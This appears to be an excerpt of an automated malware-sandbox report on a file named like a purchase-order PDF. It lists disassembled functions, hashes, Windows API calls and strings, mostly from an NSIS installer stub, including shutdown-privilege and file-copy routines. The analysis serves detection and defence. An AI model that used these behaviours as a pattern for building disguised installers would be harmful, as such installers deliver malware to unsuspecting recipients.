String ID:
API String ID:
Opcode ID: f39a6bfca563e877d05bbfffad7af47a2162f6129e13997e4aea51325d70dffe
Instruction ID: b587b941de301d41ee19567879a6de0501a4792a4c1f200ba58f30799095da5b
Opcode Fuzzy Hash: f39a6bfca563e877d05bbfffad7af47a2162f6129e13997e4aea51325d70dffe
Instruction Fuzzy Hash: CB016832708144AFCB028E649C21AEF3FB6DFC9340B28802AF914CB281CB758D469B90

Function 0015B2F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3985b474287706d1c232e86c31354527048bc8d1983c05158f1fd6a8fc60f77a
Instruction ID: dd25587d42db07927f961f65135bcacd259d8e4b973cb97eb7fa540223b86ad3
Opcode Fuzzy Hash: 3985b474287706d1c232e86c31354527048bc8d1983c05158f1fd6a8fc60f77a
Instruction Fuzzy Hash: 4901D6367043119FD714AB79884862F76EBBFC86253148879D80DDB224FF70CC454791

Function 0015FC3F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ef316edcf3d76abab5a900adef781d13664f02759a639a26379e8ef2fb2caa
Instruction ID: 463673f95d5ae046d6650643df73b83cb7febb704f2ce1e3704a352bfcfb34f6
Opcode Fuzzy Hash: 24ef316edcf3d76abab5a900adef781d13664f02759a639a26379e8ef2fb2caa
Instruction Fuzzy Hash: 2E01D130D00288DFDB04CFA5D8086E9BBB2FB8E301F045038EA1077260CB365A96CF64

Function 0015FFB0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c904826f39aa19b11ec11d6d38f6701def8d5622c4d19f0b9b2b0ae0a0833c
Instruction ID: e971381678ccea75d1811f7e686bac84ed6d73c54f961c0c52f1d6d1e3b2f1ad
Opcode Fuzzy Hash: 94c904826f39aa19b11ec11d6d38f6701def8d5622c4d19f0b9b2b0ae0a0833c
Instruction Fuzzy Hash: D1E0D8366083069F97168B70D550857BFA29FC6316716486FE458C7570D720CC298751

Function 0015FE20 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da26fe4089632b3e9f6d295d91480fecf41630c171295e554bbfa4c4d2d2e4fb
Instruction ID: 89714eeed38384d8857deebd8d77b18283e5a9ca65cec7d55abd1e7a2d42e135
Opcode Fuzzy Hash: da26fe4089632b3e9f6d295d91480fecf41630c171295e554bbfa4c4d2d2e4fb
Instruction Fuzzy Hash: D1E01274D05208DFC744DFB9E54969DBBF6EB49301F6091BAD818A3350EB305E45DB40

Function 00151888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c37edafb4d66f51732a10af9ef24833c264810173fe93ef543f6f91c657fe3a8
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: c37edafb4d66f51732a10af9ef24833c264810173fe93ef543f6f91c657fe3a8
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 0015FF30 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7e0222b93f3e140a59d0de1751cd16169f560b40d4f7b905cbccf1fb75866c8
Instruction ID: 4ac426e9a9290908a797e782ae544fd3980ae87e5d2411a2f44ec638fc7184a7
Opcode Fuzzy Hash: b7e0222b93f3e140a59d0de1751cd16169f560b40d4f7b905cbccf1fb75866c8
Instruction Fuzzy Hash: C0D0A930801209DBC340DBA4E809AA9B778A703302F0010A8A808232108BB00E00C685

Function 00155710 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2918163081.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 763204d517f282fa23197dd0d45a1e6e4790b3b6dae89bf061c7beb93e5fb504
Instruction ID: 175219d3bd827bdd69e10220c27c39674ddc7bd0a4f8d45a2505b78d5aea22a5
Opcode Fuzzy Hash: 763204d517f282fa23197dd0d45a1e6e4790b3b6dae89bf061c7beb93e5fb504
Instruction Fuzzy Hash: 7CC012304443084EC501F766DD45555B72FE780200B408520A1090767FEFB459DA8E90

Non-executed Functions

Function 004032A0 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 401stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004032C2
GetVersion.KERNEL32 ref: 004032C8
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
OleInitialize.OLE32(00000000), ref: 0040331F
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
DeleteFileW.KERNEL32(00441000), ref: 0040352B

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

OleUninitialize.OLE32(?), ref: 004035F6
ExitProcess.KERNEL32 ref: 00403618
lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
AdjustTokenPrivileges.ADVAPI32 ref: 00403776
ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
ExitProcess.KERNEL32 ref: 004037BE

Strings

USERENV, xrefs: 004032F1
NSIS Error, xrefs: 00403341
SeShutdownPrivilege, xrefs: 0040374D
.tmp, xrefs: 0040363F
\Temp, xrefs: 004034DC
Error launching installer, xrefs: 004035AD
TMP, xrefs: 00403512
Low, xrefs: 004034F8
SETUPAPI, xrefs: 004032FB
~nsu, xrefs: 00403623
TEMP, xrefs: 0040350A
UXTHEME, xrefs: 004032E7

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-3972089011
Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B48
GetDlgItem.USER32(?,00000408), ref: 00404B53
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
LoadBitmapW.USER32(0000006E), ref: 00404BB0
SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
DeleteObject.GDI32(00000000), ref: 00404C26
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
GetWindowLongW.USER32(?,000000F0), ref: 00404D61
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
ShowWindow.USER32(?,00000005), ref: 00404D80
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
ImageList_Destroy.COMCTL32(?), ref: 00404F50
GlobalFree.KERNEL32(?), ref: 00404F60
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
SendMessageW.USER32(?,00001102,?,?), ref: 00405082
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
ShowWindow.USER32(?,00000000), ref: 004050FF
GetDlgItem.USER32(?,000003FE), ref: 0040510A
ShowWindow.USER32(00000000), ref: 00405111

Strings

M, xrefs: 00404CDA
N, xrefs: 00404DBB
, xrefs: 004050E9

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

Function 00405846 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
FindClose.KERNEL32(00000000), ref: 0040599F

Strings

\*.*, xrefs: 004058B1

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E

Function 004052F3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405351
GetDlgItem.USER32(?,000003EE), ref: 00405360
GetClientRect.USER32(?,?), ref: 0040539D
GetSystemMetrics.USER32(00000002), ref: 004053A4
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
ShowWindow.USER32(?,00000008), ref: 00405440
GetDlgItem.USER32(?,000003EC), ref: 00405461
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
GetDlgItem.USER32(?,000003F8), ref: 0040536F

Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

GetDlgItem.USER32(?,000003EC), ref: 004054B3
CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
CloseHandle.KERNEL32(00000000), ref: 004054C8
ShowWindow.USER32(00000000), ref: 004054EC
ShowWindow.USER32(?,00000008), ref: 004054F1
ShowWindow.USER32(00000008), ref: 0040553B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
CreatePopupMenu.USER32 ref: 00405580
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
GetWindowRect.USER32(?,?), ref: 004055B4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
OpenClipboard.USER32(00000000), ref: 00405615
EmptyClipboard.USER32 ref: 0040561B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
GlobalLock.KERNEL32(00000000), ref: 00405631
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
GlobalUnlock.KERNEL32(00000000), ref: 00405665
SetClipboardData.USER32(0000000D,00000000), ref: 00405670
CloseClipboard.USER32 ref: 00405676

Strings

{, xrefs: 00405559

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58

Function 00403C41 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
ShowWindow.USER32(?), ref: 00403C9A
DestroyWindow.USER32 ref: 00403CAE
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
GetDlgItem.USER32(?,?), ref: 00403CEB
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
IsWindowEnabled.USER32(00000000), ref: 00403D06
GetDlgItem.USER32(?,00000001), ref: 00403DB4
GetDlgItem.USER32(?,00000002), ref: 00403DBE
SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
GetDlgItem.USER32(?,00000003), ref: 00403ECF
ShowWindow.USER32(00000000,?), ref: 00403EF0
EnableWindow.USER32(?,?), ref: 00403F02
EnableWindow.USER32(?,?), ref: 00403F1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
EnableMenuItem.USER32(00000000), ref: 00403F3A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
ShowWindow.USER32(?,0000000A), ref: 004040D6

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

Function 004042B6 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
GetDlgItem.USER32(?,000003E8), ref: 00404368
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
GetSysColor.USER32(?), ref: 00404396
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
lstrlenW.KERNEL32(?), ref: 004043B7
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
GetDlgItem.USER32(?,0000040A), ref: 00404432
SendMessageW.USER32(00000000), ref: 00404439
GetDlgItem.USER32(?,000003E8), ref: 00404464
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
SetCursor.USER32(00000000), ref: 004044B8
ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
SetCursor.USER32(00000000), ref: 004044DC
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D

Strings

-B@, xrefs: 004044C2
open, xrefs: 004044C5
N, xrefs: 00404452

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: -B@$N$open
API String ID: 3615053054-1057335957
Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98

Function 0040389E Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458

lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

RegisterClassW.USER32(00433EA0), ref: 00403A43
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
ShowWindow.USER32(00000005,00000000), ref: 00403AC6
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
RegisterClassW.USER32(00433EA0), ref: 00403B08
DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27

Strings

RichEdit, xrefs: 00403AF9
RichEdit20W, xrefs: 00403AEA, 00403AF0
.exe, xrefs: 004039AC
.DEFAULT\Control Panel\International, xrefs: 0040390A
RichEd32, xrefs: 00403ADA
RichEd20, xrefs: 00403ACC
Control Panel\Desktop\ResourceLocale, xrefs: 004038D2
_Nb, xrefs: 00403A22, 00403A8A

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
